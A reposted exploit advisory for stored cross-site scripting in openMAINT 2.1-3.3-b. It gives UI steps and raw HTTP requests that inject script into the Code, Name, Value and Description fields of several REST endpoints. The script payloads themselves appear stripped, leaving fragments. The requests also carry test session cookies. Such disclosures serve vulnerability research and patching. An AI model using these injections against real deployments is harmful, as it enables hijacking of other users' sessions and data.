openMAINT 2.1-3.3-b Cross Site Scripting ≈ Packet Storm – Digitalmunition




Exploit/Advisories no-image-featured-image.png

Published on March 17th, 2021 📆 | 4865 Views ⚑

0

openMAINT 2.1-3.3-b Cross Site Scripting ≈ Packet Storm

# Exploit Title: openMAINT openMAINT 2.1-3.3-b – ‘Multiple’ Persistent Cross-Site Scripting
# Date: 13/03/2021
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.openmaint.org/
# Software Link: https://sourceforge.net/projects/openmaint/files/2.1/Core%20updates/openmaint-2.1-3.3.1/
# Version: 2.1-3.3
# Tested on: Linux

Summary:

Multiple stored cross-site scripting (XSS) vulnerabilities in openMAINT 2.1-3.3-b allow remote attackers to inject arbitrary web script or HTML via any “Add” sections, such as Add Card Building & Floor, or others in the Name And Code Parameters.

Proof of concepts :

1-Login to you’r Dashboard As a low privilege user
2-Click On Facilities and assets – Location – Sites
3- +Add card Building
4- Code and name parameters both are vulnerable

POST /openmaint/services/rest/v3/classes/Building/cards?_dc=1615626728539 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
…..
Cookie: …

{“_type”:”Building”,”_tenant”:””,”Code”:””>“,”Description”:null,”Name”:””>“,….}

The Xss will trigger in that form, and also if you click on “Map” button , the xss will trigger there

————————————————————————
Another Xss :

1-Like above in Facilities click on Locations and click on complex
2-click + Add card Complex
3-insert javascript payload to Code And Name

POST /openmaint/services/rest/v3/classes/Complex/cards?_dc=1615627279082 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
….
Connection: close
Referer:
Cookie: ….

{“_type”:”Complex”,”_tenant”:””,”Code”:””>“,”Description”:null,”Name”:””>“,…}

4-Save it
5-Back to Sites and click on previous card
6- in position section click on “Complex” drop down
7- xss will trigger

————————————————————————
Another Xss:

1-Like exmaples above go to Locations and click on Sites
2-Add Card Building or click the one you created before
3-in left menu click on “Relations”
4-click “Add relations” and select one of the options
5- Add Card and select one of the options
6- insert javascript payload to code and name parameter

POST /openmaint/services/rest/v3/classes/Alarm/cards?_dc=1615628392695 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
Connection: close
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578

{“_type”:””,”_tenant”:””,”Code”:””>“,”Name”:””>“,”Description”:null,….. }

7- save it and close the form
8-click on the card and there an option which is “Open Relation Graph” click on it and click on card list
9- xss payload will trigger

——————————————————

Another Xss:

1- In “Navigation” Bar click on “Configurations”
2- Click on parameter
3- + Add card Parameter
4- Insert javascript payload to Code and Value

PUT /openmaint/services/rest/v3/classes/Parameter/cards/385606?_dc=1615629885175 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json

Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578

{“_type”:”Parameter”,”_tenant”:””,”Area”:null,”Code”:”–‘”>“,”Description”:null,”Value”:”–‘”>“,….}

save it and like the previous one click on “Open Relation Graph” and in card List your xss will trigger

——————————————————-

Another Xss:

1-Click Facilities and assets
2-Locations
3-Select one of cards
4-Click “Add Card”
5-in “Attachments” tab click “Add attachment” select “Document” or “image”
6-insert javascript payload in “Code” and “Description”

PUT /openmaint/services/rest/v3/classes/Complex/cards/384220/attachments/apovsxflx4j269tx08h1eoayg2vn9eyhbfh06079bm37cr7uk63l75oetcmzc1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
CMDBuild-ActionId: class.card.attachments.open
CMDBuild-RequestId: 52807186-932d-448b-bfe3-8a51b596bcb8
Content-Type: multipart/form-data; boundary=—————————1049383330380851725139941543
Content-Length: 1020
Connection: close
Cookie: CMDBuild-Localization=en; CMDBuild-Authorization=j130sjfhd7j6fzf88n93ue7l; _ga=GA1.2.786635877.1615617578; _gid=GA1.2.1992324670.1615617578

—————————–1049383330380851725139941543
Content-Disposition: form-data; name=”attachment”; filename=”blob”
Content-Type: application/json

{“_…..”Code”:”–‘”>“,”Description”:”–‘”>“,”…}
—————————–1049383330380851725139941543–

7-save it and xss will trigger

Source link

Tagged with:



Leave a Reply